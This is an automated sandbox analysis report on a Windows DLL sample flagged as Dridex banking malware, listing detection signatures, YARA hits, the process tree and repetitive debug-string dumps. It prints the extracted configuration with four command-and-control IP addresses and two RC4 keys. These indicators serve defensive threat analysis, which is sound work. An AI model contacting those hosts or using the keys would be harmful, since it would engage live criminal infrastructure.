Play interactive tour

Edit tour

Windows Analysis Report SecuriteInfo.com.W32.AIDetect.malware2.28165.16859

Overview

General Information

Sample Name:	SecuriteInfo.com.W32.AIDetect.malware2.28165.16859 (renamed file extension from 16859 to dll)
Analysis ID:	544258
MD5:	9d86b7a93411bd7cc5c68b4f49709c27
SHA1:	199faa9305b8a1f6645c07098990ac62da6a7d4d
SHA256:	03d956e36d96255794c7999c52cbc3ea5fc6ec52193a0a3db40e7fb1414b6219
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Dridex unpacked file

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Call by Ordinal

Tries to delay execution (extensive OutputDebugStringW loop)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Checks if the current process is being debugged

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Entry point lies outside standard sections

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 1112 cmdline: loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.28165.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)

cmd.exe (PID: 5040 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.28165.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 1752 cmdline: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.28165.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 6184 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 684 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000003.00000000.259712771.000000006E861000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000000.261876126.000000006E861000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000002.296373547.000000006E861000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Unpacked PEs

Source	Rule	Description	Author
1.2.loaddll32.exe.6e860000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.0.rundll32.exe.6e860000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.2.rundll32.exe.6e860000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.0.rundll32.exe.6e860000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal

Show sources

Source: Process started

Author: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.28165.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.28165.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.28165.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5040, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.28165.dll",#1, ProcessId: 1752

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 3.0.rundll32.exe.6e860000.5.unpack

Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["144.91.122.102:443", "85.10.248.28:593", "185.4.135.27:5228", "80.211.3.13:8116"], "RC4 keys": ["3IC8sFlUX9XZuoBQY9u5LhcZnHsV7E5r", "hnk63OiMfIbUqQnY7gkPwplwC0Ue5ZkZBYMCTYTjntqX7zsy9OvtNUlthJZXRtFF6P52Zbz6R5"]}

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	Virustotal: Detection: 19%			Perma Link
Source: SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	ReversingLabs: Detection: 23%

Source: SecuriteInfo.com.W32.AIDetect.malware2.28165.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.W32.AIDetect.malware2.28165.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.266324902.0000000003194000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.266272870.00000000050CD000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb1} source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: lbase.pdb source: WerFault.exe, 00000007.00000003.267090243.00000000050CE000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.266272870.00000000050CD000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000001.00000003.262686666.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.267173451.000000000318E000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp
Source:	Binary string: propsys.pdb7} source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb-} source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb*h source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb_} source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb} source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.266231400.000000000319A000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: SecuriteInfo.com.W32.AIDetect.malware2.28165.dll
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdbY} source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.262686666.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb;} source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000007.00000003.266231400.000000000319A000.00000004.00000001.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdb#} source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 144.91.122.102:443
Source: Malware configuration extractor	IPs: 85.10.248.28:593
Source: Malware configuration extractor	IPs: 185.4.135.27:5228
Source: Malware configuration extractor	IPs: 80.211.3.13:8116

Source: Joe Sandbox View	ASN Name: TOPHOSTGR TOPHOSTGR
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: ARUBA-ASNIT ARUBA-ASNIT

Source: Joe Sandbox View	IP Address: 185.4.135.27 185.4.135.27
Source: Joe Sandbox View	IP Address: 85.10.248.28 85.10.248.28
Source: Joe Sandbox View	IP Address: 80.211.3.13 80.211.3.13

Source: WerFault.exe, 00000007.00000002.293717271.0000000005035000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.291285392.0000000005041000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.290926093.0000000005035000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: loaddll32.exe, 00000001.00000002.778061208.000000006E87F000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.259884541.000000006E87F000.00000002.00020000.sdmp	String found in binary or memory: http://www.forex-broker.websiteDVarFileInfo$

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 1.2.loaddll32.exe.6e860000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.6e860000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6e860000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.rundll32.exe.6e860000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.259712771.000000006E861000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.261876126.000000006E861000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.296373547.000000006E861000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.778004464.000000006E861000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Source: SecuriteInfo.com.W32.AIDetect.malware2.28165.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.W32.AIDetect.malware2.28165.dll

Binary or memory string: OriginalFilenameIha.dllD vs SecuriteInfo.com.W32.AIDetect.malware2.28165.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 684

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E870730	1_2_6E870730
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E879370	1_2_6E879370
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E861494	1_2_6E861494
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E86A4E8	1_2_6E86A4E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E868428	1_2_6E868428
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E87143C	1_2_6E87143C

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E872234 NtDelayExecution,		1_2_6E872234
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E872820 NtAllocateVirtualMemory,		1_2_6E872820

Source: C:\Windows\System32\loaddll32.exe

Process Stats: CPU usage > 98%

Source: SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	Virustotal: Detection: 19%
Source: SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	ReversingLabs: Detection: 23%

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.28165.dll",#1

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.28165.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.28165.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.28165.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 684
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.28165.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.28165.dll",#1	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1752

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER169.tmp

Jump to behavior

Source: classification engine

Classification label: mal76.troj.evad.winDLL@6/6@0/4

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: SecuriteInfo.com.W32.AIDetect.malware2.28165.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: SecuriteInfo.com.W32.AIDetect.malware2.28165.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.266324902.0000000003194000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.266272870.00000000050CD000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb1} source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: lbase.pdb source: WerFault.exe, 00000007.00000003.267090243.00000000050CE000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.266272870.00000000050CD000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000001.00000003.262686666.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.267173451.000000000318E000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp
Source:	Binary string: propsys.pdb7} source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb-} source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb*h source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb_} source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb} source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp, WerFault.exe, 00000007.00000003.266231400.000000000319A000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: RFFGTEQ.pdb source: SecuriteInfo.com.W32.AIDetect.malware2.28165.dll
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdbY} source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.262686666.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb;} source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000007.00000003.266231400.000000000319A000.00000004.00000001.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.270869696.0000000005530000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.270859779.0000000005391000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdb#} source: WerFault.exe, 00000007.00000003.270884177.0000000005536000.00000004.00000040.sdmp

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E86F6A8 push esi; mov dword ptr [esp], 00000000h

1_2_6E86F6A9

Source: initial sample

Static PE information: section where entry point is pointing to: .rdata

Source: C:\Windows\SysWOW64\WerFault.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
